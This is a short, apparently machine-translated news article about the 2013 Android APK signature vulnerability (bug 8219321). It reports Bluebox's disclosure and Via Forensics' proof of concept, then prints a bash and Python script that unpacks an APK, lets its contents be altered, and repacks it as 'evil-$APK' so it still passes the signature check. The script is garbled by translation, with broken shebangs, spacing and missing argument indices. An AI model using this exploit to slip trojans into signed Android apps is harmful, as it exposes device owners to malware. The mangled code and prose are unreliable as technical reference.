A few days ago, the company Bluebox Security announced that at the Black Hat USA 2013 conference, which begins July 27, 2013, they will talk about the enchanting vulnerability in the security model of the operating system Android, which allows an attacker to modify the contents of the APK file, without changing the cryptographic signature. In other words, any application can add the Trojans, keeping the cryptographic signature of the original author’s application.
The vulnerability has been around for four years since Android 1.6, that is, there is a minimum of 900 million devices. About the bug reported to Google in February, it was registered under number 8219321, and seemed to have closed in new versions of firmware Samsung, but stayed on all other devices.
Hackers from the company Via Forensics did not wait for the conference – and yesterday issued a PoC exploit code .
Decompilation, the introduction of the code and recompile the APK can be accomplished using the program to reverse engineer APKTool .
Simple code published below, exploits a vulnerability of the operating system Android, which verifies the signature of the original file, but it sets an updated version.
#! / Bin / bash # PoC for Android bug 8219321 by @ pof # + Info: https://jira.cyanogenmod.org/browse/CYAN-1602 if [-z $ 1]; then echo "Usage: $ 0 "; Exit 1; fi APK = $ 1 rm-r out out.apk tmp 2> / dev / null java-jar apktool.jar d $ APK out # Apktool d $ APK out echo "Modify files, when done type 'exit'" cd out bash cd .. java-jar apktool.jar b out out.apk # Apktool b out out.apk mkdir tmp cd tmp / unzip .. / $ APK mv .. / out.apk. cat> poc.py <<-EOF #! / Usr / bin / python import zipfile import sys z = zipfile.ZipFile (sys.argv , "a") z.write (sys.argv ) z.close () EOF chmod 755 poc.py for f in `find. -Type f | egrep-v "(poc.py | out.apk)" `; do. / Poc.py out.apk" $ f "; done cp out.apk .. / evil-$ APK cd .. rm-rf tmp out echo "Modified APK: evil-$ APK"